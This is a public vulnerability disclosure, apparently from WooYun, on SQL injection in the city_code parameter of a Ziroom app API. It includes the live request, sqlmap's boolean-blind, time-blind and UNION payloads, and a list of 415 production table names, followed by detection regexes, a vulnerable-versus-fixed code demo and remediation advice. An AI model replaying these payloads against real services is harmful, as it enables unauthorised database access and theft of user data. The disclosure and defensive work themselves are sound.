Vulnerability summary (24 followers)
Vulnerability details
Disclosure status:
2016-04-22: Details sent to the vendor; awaiting vendor handling
2016-04-22: Vendor confirmed; details visible to the vendor only
2016-05-02: Details opened to core white hats and relevant domain experts
2016-05-12: Details opened to regular white hats
2016-05-22: Details opened to intern white hats
2016-06-06: Details made public

Brief description:
SQL injection in the Ziroom Youjia (自如友家) app, exposing 415 tables and more than 1.98 million rows of data.
Detailed description:
Endpoint and parameters (the injectable parameter is city_code in the POST body; the request below is the baseline request as sent by the Android client, which sqlmap was later fed as a request file):
POST /index.php?_p=api_mobile&_a=get_hotSearchWords HTTP/1.1
Content-Length: 190
Content-Type: application/x-www-form-urlencoded
Host: interfaces.ziroom.com
Connection: close
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.100.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000&app=v3.3.1&os=android%3A5.1&model=8681-A01
Proof of vulnerability (sqlmap output; the run resumed a stored session, so the injection points below were confirmed in an earlier run):
[*] starting at 16:55:01
[16:55:01] [INFO] parsing HTTP request from 'yy.txt'
[16:55:02] [INFO] resuming back-end DBMS 'mysql' 
[16:55:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: city_code (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000 AND 1153=1153&app=v3.3.1&os=android:5.1&model=8681-A01
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000 AND (SELECT * FROM (SELECT(SLEEP(5)))yfFI)&app=v3.3.1&os=android:5.1&model=8681-A01
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000 UNION ALL SELECT CONCAT(0x7170707071,0x57724b52437841506852734e69546e4a4b567079686d587a6b625754486470416377694a7a655373,0x71766b7171)-- sKhk&app=v3.3.1&os=android:5.1&model=8681-A01
---
[16:55:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.22
back-end DBMS: MySQL >= 5.0.12 (a lower bound from sqlmap's basic fingerprint, not the exact server version)
[16:55:02] [INFO] fetching tables for database: 'newziroom'
[16:55:02] [INFO] the SQL query used returns 415 entries
Database: newziroom
[415 tables]
+--------------------------------------+
| user                                 |
| active_sz_yushouka                   |
| activity_wx_plus_2                   |
| api_house_shelf_apply                |
| api_house_shelf_following            |
| api_house_shelf_reason               |
| cash                                 |
| cash_tmp                             |
| cms_activity_manage                  |
| cms_huilei_apply                     |
| cms_huilei_house                     |
| cms_serverinfo_manage                |
| collection                           |
| complain                             |
| complain_content                     |
| log_crm_request                      |
| m_look_push                          |
| m_msg_guanjia                        |
| m_msg_jpush                          |
| m_msg_ziroomer                       |
| m_newsign_order_jdloan_refund_log    |
| m_newsign_orders_log                 |
| m_payment_callback_log               |
| m_user_count_log                     |
| m_will_about_user_detail             |
| m_zwp_appointment_look               |
| member_list                          |
| operation_log                        |
| pay_cron_list                        |
| pay_order                            |
| pay_order_success                    |
| pay_terraceorder_success             |
| payment_order                        |
| payment_order_callback_log           |
| shhsh_recommended_user_info          |
| shhsh_ziroomer_info                  |
| steward                              |
| sz_seed_plan                         |
| sz_seed_plan_pic                     |
| sz_seed_plan_question                |
| szhsh_recommended_user_info          |
| szhsh_ziroomer_info                  |
| t_400_day_detail                     |
| t_account_log                        |
| t_active_base                        |
| t_admin_auth                         |
| t_ams_book_api                       |
| t_appointment                        |
| t_area                               |
| t_arrange                            |
| t_award                              |
| t_award_getting                      |
| t_award_hd                           |
| t_award_list                         |
| t_award_movie                        |
| t_awardlist                          |
| t_awardlist_bak                      |
| t_baojie_decode_action               |
| t_baojie_pay_centre_action           |
| t_baojie_pay_click_action            |
| t_base                               |
| t_bills                              |
| t_blacklist                          |
| t_blind_base                         |
| t_blind_vote                         |
| t_bookonline_customer                |
| t_business                           |
| t_business_bak                       |
| t_cards_log                          |
| t_chest_points                       |
| t_chest_vote                         |
| t_city                               |
| t_citys                              |
| t_cms_account_log                    |
| t_cms_activityApp                    |
| t_cms_activityApp_body               |
| t_cms_activityApp_detail             |
| t_cms_ad                             |
| t_cms_ad_index                       |
| t_cms_ad_index_pic                   |
| t_cms_ad_keywords                    |
| t_cms_ad_new                         |
| t_cms_ad_new_pic                     |
| t_cms_ad_room                        |
| t_cms_ad_room_category               |
| t_cms_ad_room_phone                  |
| t_cms_administrator                  |
| t_cms_app_version                    |
| t_cms_cdotp_activity                 |
| t_cms_change_log                     |
| t_cms_customer_message               |
| t_cms_faq                            |
| t_cms_faq_list                       |
| t_cms_friend_message                 |
| t_cms_gift_init                      |
| t_cms_html                           |
| t_cms_links                          |
| t_cms_links_modules                  |
| t_cms_links_type                     |
| t_cms_m_keywords                     |
| t_cms_m_room                         |
| t_cms_m_room_category                |
| t_cms_message_log                    |
| t_cms_newsblogs_list                 |
| t_cms_newsblogs_list_01              |
| t_cms_newsblogs_type                 |
| t_cms_newsblogs_type_01              |
| t_cms_newyear                        |
| t_cms_part                           |
| t_cms_part_search                    |
| t_cms_part_search_copy               |
| t_cms_project                        |
| t_cms_qa                             |
| t_cms_qa_type                        |
| t_cms_sales_manage                   |
| t_cms_same_city                      |
| t_cms_service_answer                 |
| t_cms_service_guide                  |
| t_cms_service_question               |
| t_cms_service_star                   |
| t_cms_subwayadvers                   |
| t_cms_svr_tool                       |
| t_cms_sys_message                    |
| t_cms_tax                            |
| t_cms_up_project                     |
| t_cms_user                           |
| t_cms_user1                          |
| t_cms_user20150816                   |
| t_cms_user20160125                   |
| t_cms_user_0125XU                    |
| t_cms_user_20160125bak               |
| t_cms_user_copy                      |
| t_cms_user_old                       |
| t_cms_user_zx0126                    |
| t_cms_vanke_activity                 |
| t_cms_warmprompt                     |
| t_cms_xiaoqu_feature                 |
| t_cms_xiaoqu_feature_photo           |
| t_cms_year_order                     |
| t_cms_ziroom_announcement            |
| t_cms_ziroomer_category              |
| t_cms_ziroomer_cheer                 |
| t_cms_ziroomer_commendatory_letter   |
| t_cms_ziroomer_index                 |
| t_cms_ziroomer_shop                  |
| t_cms_ziroommanager                  |
| t_cms_ziruyu_story                   |
| t_common_account                     |
| t_common_actual_account              |
| t_community_around                   |
| t_complain                           |
| t_contract                           |
| t_contract_book                      |
| t_contract_book_payVoucher           |
| t_contract_cards                     |
| t_contract_chest                     |
| t_contract_direct                    |
| t_contract_direct_active_log         |
| t_contract_direct_activities         |
| t_contract_direct_activities_bak     |
| t_contract_direct_activities_log     |
| t_contract_direct_api_log            |
| t_contract_direct_api_log_old        |
| t_contract_direct_cust               |
| t_contract_direct_payVoucher         |
| t_contract_direct_promotion          |
| t_contract_direct_property1          |
| t_contract_direct_property2          |
| t_contract_direct_property3          |
| t_contract_direct_receipt            |
| t_contract_direct_renter             |
| t_contract_direct_renter_log         |
| t_contract_direct_step_log           |
| t_contract_direct_substep            |
| t_contract_direct_upcust_log         |
| t_contract_insert                    |
| t_contract_insert_api_log            |
| t_contract_insert_receipt            |
| t_contract_jingdong                  |
| t_contract_log                       |
| t_contract_online                    |
| t_contract_receipt_retry_list        |
| t_contract_renew                     |
| t_contract_reservation               |
| t_contract_reservation_active_log    |
| t_contract_reservation_comment       |
| t_contract_reservation_customer      |
| t_contract_reservation_customer_log  |
| t_contract_reservation_customer_mlog |
| t_contract_reservation_house         |
| t_contract_reservation_pay_list      |
| t_contract_reservation_pay_log       |
| t_contract_reservation_refund        |
| t_contract_ziruyu_contract_complete  |
| t_contract_ziruyu_error              |
| t_contract_ziruyu_pay_callback       |
| t_contract_ziruyu_pay_complete       |
| t_contract_ziruyu_pay_url_log        |
| t_contract_ziruyu_sync_log           |
| t_coupon_card                        |
| t_coupon_card_160203                 |
| t_coupon_card_bak                    |
| t_crm_book_look                      |
| t_crm_book_look_msg                  |
| t_crm_contract_house_belonger        |
| t_crm_customer                       |
| t_crm_customer_msg                   |
| t_crm_data_report                    |
| t_crm_direct                         |
| t_crm_following                      |
| t_crm_lease                          |
| t_crm_lease_con                      |
| t_crm_lease_operate                  |
| t_crm_lookhouse                      |
| t_crm_lookhouse_msg                  |
| t_crm_lookhouse_wi                   |
| t_crm_notify                         |
| t_crm_relation                       |
| t_crm_relation_item                  |
| t_crm_relation_new                   |
| t_crm_reservation                    |
| t_crm_work_all                       |
| t_crm_work_log                       |
| t_customer                           |
| t_customer_rating                    |
| t_cycle                              |
| t_cycle_face                         |
| t_dakehu_comment                     |
| t_dakehu_groupCustomers              |
| t_dakehu_new                         |
| t_dakehu_notice                      |
| t_dakehu_teamwork                    |
| t_dakehu_teamwork_content            |
| t_dict                               |
| t_dict_school                        |
| t_district                           |
| t_district_bak                       |
| t_district_business                  |
| t_district_business_bak              |
| t_dspeak                             |
| t_duanzu_apply                       |
| t_duanzu_rss                         |
| t_ehr_dept                           |
| t_ehr_dept_log                       |
| t_ehr_job                            |
| t_ehr_job_log                        |
| t_ehr_person                         |
| t_ehr_person_log                     |
| t_exist_pic_house                    |
| t_feedback                           |
| t_function                           |
| t_general_consumption_api_log        |
| t_general_consumption_customer       |
| t_general_consumption_detail         |
| t_general_consumption_operation_log  |
| t_general_consumption_status         |
| t_general_consumption_temp           |
| t_general_consumption_type           |
| t_general_receipt_detail             |
| t_general_receipt_stand_num          |
| t_gift                               |
| t_gift_bak                           |
| t_gift_bat                           |
| t_gift_by_user                       |
| t_gift_by_user_s                     |
| t_gift_cms_admin                     |
| t_gift_gj                            |
| t_gift_gj_s                          |
| t_guest                              |
| t_haiyan_tour                        |
| t_house                              |
| t_house_room_lock                    |
| t_index_ziroomer                     |
| t_index_ziroomer_wb                  |
| t_integral_add_log                   |
| t_intention_house_info               |
| t_ios_channel                        |
| t_ios_msg                            |
| t_keyword                            |
| t_log                                |
| t_login_log                          |
| t_loginlog                           |
| t_map_building                       |
| t_map_content                        |
| t_map_suggestion                     |
| t_map_type                           |
| t_memecache_queue_log                |
| t_menu                               |
| t_move_house                         |
| t_order_log                          |
| t_order_pay_log                      |
| t_pay                                |
| t_pay_account                        |
| t_pay_account_relet                  |
| t_pay_actual_account                 |
| t_pay_actual_account_relet           |
| t_pay_plan                           |
| t_pay_plan_direct                    |
| t_pay_plan_online                    |
| t_pay_plan_renew                     |
| t_payment_log                        |
| t_payment_receipt                    |
| t_penalty_change_log                 |
| t_penalty_plan                       |
| t_permission                         |
| t_permission_group                   |
| t_profile                            |
| t_project_images                     |
| t_province                           |
| t_quality_rating                     |
| t_question                           |
| t_questionnaire                      |
| t_rebate                             |
| t_recruit                            |
| t_recruit_detail                     |
| t_referee                            |
| t_referee_card                       |
| t_referee_card_send_record           |
| t_referee_question_answer            |
| t_relation_recruit                   |
| t_renew_apply                        |
| t_renew_expire                       |
| t_repair                             |
| t_role                               |
| t_room                               |
| t_room_pictures_new                  |
| t_room_promotion                     |
| t_room_promotion_type                |
| t_seekziroomer_base                  |
| t_seekziroomer_vote                  |
| t_sellcontrol_log                    |
| t_service_common_question_keyword    |
| t_soap_bind_phone                    |
| t_soap_bind_phone20160125            |
| t_soap_bind_phone20160125bak         |
| t_soap_bind_phone_0125XU             |
| t_soap_bind_phone_160315             |
| t_soap_bind_phone_160412             |
| t_soap_bind_phone_bak20150814        |
| t_soap_bind_phone_zx0126             |
| t_sowing                             |
| t_special                            |
| t_steward_business                   |
| t_steward_business_20150505          |
| t_sub_station                        |
| t_subway                             |
| t_subway_station                     |
| t_subway_station_bak                 |
| t_suding_house                       |
| t_suding_order                       |
| t_suding_pay_log                     |
| t_suding_refund_log                  |
| t_suding_reservation                 |
| t_suding_term                        |
| t_suding_yuyue                       |
| t_summer                             |
| t_temp_contract_activity             |
| t_temp_jd_activity_lottery           |
| t_temp_jd_activity_winner_list       |
| t_ticket                             |
| t_trends                             |
| t_update_login                       |
| t_user                               |
| t_user_appointment                   |
| t_user_date                          |
| t_web_navigation                     |
| t_www_ziruyu_yuyue                   |
| t_zhuanti_color_life                 |
| t_ziroomlife_activity                |
| t_ziroomlife_bulletin                |
| t_ziroomlife_businessinfo            |
| t_ziroomlife_neighborreminder        |
| t_ziroomlife_news                    |
| t_ziroomlife_vote                    |
| t_ziruyu_activity                    |
| t_ziruyu_winner                      |
| t_ziruyu_yuyue                       |
| t_zrsd_log                           |
| temp_table1                          |
| test                                 |
| tmp                                  |
| tmp_newziroom_xiazhi                 |
| tmp_xiazhi                           |
| u_general_receipt_callback_log       |
| u_general_receipt_order              |
| u_general_receipt_order_callback     |
| u_general_receipt_to_crm_error       |
| u_general_receipt_to_crm_log         |
| unfirst_pay_internal_consu           |
| unfirst_pay_notify_log               |
| unfirst_pay_order                    |
| unfirst_pay_post_log                 |
| unfirst_pay_return_log               |
| v_room                               |
| v_roomandcustomer                    |
| wx_activity                          |
| wx_credit_record                     |
| wx_credit_total                      |
| wx_move_code                         |
| wx_user                              |
| ziroom_flat                          |
| ziroom_simple_life                   |
| zrlife                               |
| zsl_activity_info                    |
| zsl_pic_address                      |
| zsl_vote_info                        |
| zsl_ziroomer_info                    |
| zwp_archives_evaluation              |
| zwp_archives_surrounding             |
| zwp_groups                           |
| zwp_nums                             |
| zwp_permission                       |
| zwp_permission_relation              |
| zwp_user_group_relation              |
| zwp_user_group_relation_copy         |
+--------------------------------------+
[16:55:02] [INFO] fetched data logged to text files under 
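The three payload classes sqlmap reports above (boolean-based blind, time-based blind, UNION) leave distinctive shapes in the POST body of this endpoint. The following Python is an added example, not part of the original report: it classifies captured request bodies by those shapes. The log lines are constructed for the example and URL-encoded the way a client would send them (sqlmap prints them decoded), the line format is an assumption, and the regexes are a starting point for detection on this parameter, not a complete SQL injection signature set.

```python
import re
from urllib.parse import parse_qs

# Signatures for the three techniques sqlmap reported against city_code.
# Matched against the URL-decoded parameter value, case-insensitively.
SIGNATURES = {
    "boolean-blind": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "time-blind":    re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "union":         re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    # sqlmap brackets UNION output with long hex string markers (e.g. 0x7170707071).
    "sqlmap-marker": re.compile(r"\b0x[0-9a-f]{10,}\b", re.I),
}

# Parameters that should only ever carry plain values; a regex hit here is a finding.
WATCHED = ("city_code",)

def classify_body(body):
    """Return {param: [technique, ...]} for every watched parameter whose decoded
    value matches a signature; an empty dict means nothing suspicious."""
    params = parse_qs(body, keep_blank_values=True)
    findings = {}
    for name in WATCHED:
        for value in params.get(name, []):
            hits = [tech for tech, rx in SIGNATURES.items() if rx.search(value)]
            if hits:
                findings[name] = hits
    return findings

def scan_log(lines):
    """Assumed line format: '<time> <client-ip> POST <path> <body>'.
    Returns (time, ip, findings) for every line that trips a signature."""
    alerts = []
    for line in lines:
        ts, ip, _method, _path, body = line.split(" ", 4)
        findings = classify_body(body)
        if findings:
            alerts.append((ts, ip, findings))
    return alerts

# Constructed sample lines (not real Ziroom logs): the baseline request, then the
# three sqlmap payload classes as a client would URL-encode them.
SAMPLE_LOG = [
    "16:55:01 203.0.113.10 POST /index.php?_p=api_mobile&_a=get_hotSearchWords "
    "network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&city_code=110000&app=v3.3.1",
    "16:55:02 203.0.113.10 POST /index.php?_p=api_mobile&_a=get_hotSearchWords "
    "network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&city_code=110000+AND+1153%3D1153&app=v3.3.1",
    "16:55:03 203.0.113.10 POST /index.php?_p=api_mobile&_a=get_hotSearchWords "
    "network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&city_code=110000+AND+%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29yfFI%29&app=v3.3.1",
    "16:55:04 203.0.113.10 POST /index.php?_p=api_mobile&_a=get_hotSearchWords "
    "network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&city_code=110000+UNION+ALL+SELECT+CONCAT%280x7170707071%2C0x57724b52%2C0x71766b7171%29--+sKhk&app=v3.3.1",
]

if __name__ == "__main__":
    for ts, ip, findings in scan_log(SAMPLE_LOG):
        print(ts, ip, findings)
```

Because the payloads travel in the POST body, this only works on a log source that records the body (a WAF, reverse proxy or application-level request log), not on a plain web-server access log. The constant sign value in every line is also a useful correlation key: a signature that never changes while city_code does is itself a sign that the client is being driven by a tool rather than the app.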
 
Remediation:
Filter the parameters! More precisely: validate city_code against the shape the endpoint expects (a numeric city code such as 110000) and, above all, pass it to MySQL as a bound parameter through PDO or mysqli prepared statements rather than concatenating it into the query text; input filtering on its own is a weak defence against SQL injection. Two further points a fix should cover. First, the request carries a sign value, yet every sqlmap payload above succeeded with the original sign unchanged, so whatever that signature covers it does not bind city_code (or it is not verified before the query runs); a request signature only helps if it covers every parameter that reaches the database. Second, since the vendor attributes this to old code, the other api_mobile actions built on the same code path deserve the same review.
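To make the root cause and the fix concrete, here is an added example that is not Ziroom's code (the PHP source is not shown on this page): a toy reconstruction in Python of a lookup keyed on city_code, first in the string-concatenating form the sqlmap output implies, then in a hardened form that validates and binds the parameter. Table and column names are assumptions, SQLite stands in for MySQL (so the SLEEP()-based probe is not reproduced and the UNION probe uses a plain SELECT instead of CONCAT with hex markers), and boolean_blind_differs reproduces what sqlmap's boolean-based blind check did with the AND 1153=1153 payload in the proof section.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the 'newziroom' schema: one table the endpoint is
    meant to read and one it is not (assumed names, not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hot_search_words (city_code INTEGER, word TEXT)")
    conn.executemany("INSERT INTO hot_search_words VALUES (?, ?)",
                     [(110000, "chaoyang"), (110000, "haidian"), (310000, "pudong")])
    conn.execute("CREATE TABLE user (id INTEGER, phone TEXT)")
    conn.execute("INSERT INTO user VALUES (1, '13800000000')")
    return conn

def hot_words_vulnerable(conn, city_code):
    """The pattern the report implies: the request parameter is pasted into SQL."""
    sql = "SELECT word FROM hot_search_words WHERE city_code = " + city_code
    return [row[0] for row in conn.execute(sql)]

def hot_words_hardened(conn, city_code):
    """Allow-list the shape first, then bind the value so it can never become SQL.
    Binding alone is the essential part; the shape check just fails fast."""
    if not (city_code.isdigit() and len(city_code) == 6):
        raise ValueError("city_code must be a six-digit code")
    sql = "SELECT word FROM hot_search_words WHERE city_code = ?"
    return [row[0] for row in conn.execute(sql, (int(city_code),))]

def call(fn, conn, city_code):
    """Run a lookup the way an HTTP handler would: a rejected input becomes one
    fixed error response rather than a different result set."""
    try:
        return fn(conn, city_code)
    except ValueError as exc:
        return ("rejected", str(exc))

def boolean_blind_differs(fn, conn, base="110000"):
    """sqlmap's boolean-based blind test: the same request with a true and a false
    condition appended. A differing response means the condition reached SQL."""
    true_resp = call(fn, conn, base + " AND 1153=1153")
    false_resp = call(fn, conn, base + " AND 1153=1154")
    return true_resp != false_resp

# SQLite form of the UNION probe: pull a column from a table the endpoint never reads.
UNION_PAYLOAD = "110000 UNION ALL SELECT phone FROM user"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, blind oracle:", boolean_blind_differs(hot_words_vulnerable, db))
    print("vulnerable, UNION:", call(hot_words_vulnerable, db, UNION_PAYLOAD))
    print("hardened, blind oracle:", boolean_blind_differs(hot_words_hardened, db))
    print("hardened, UNION:", call(hot_words_hardened, db, UNION_PAYLOAD))
```

The hardened function answers both probes identically, which is exactly what removes the oracle sqlmap relies on; note that it achieves this by binding the value, not by stripping keywords, so it does not need to anticipate the next payload shape.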
Copyright notice: when reposting, please credit the source: 路人甲@乌云
Vulnerability response
Vendor response:
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2016-04-22 21:24
Vendor reply:
Legacy code issue; thanks for the heads-up, we are handling it!
Latest status:
None yet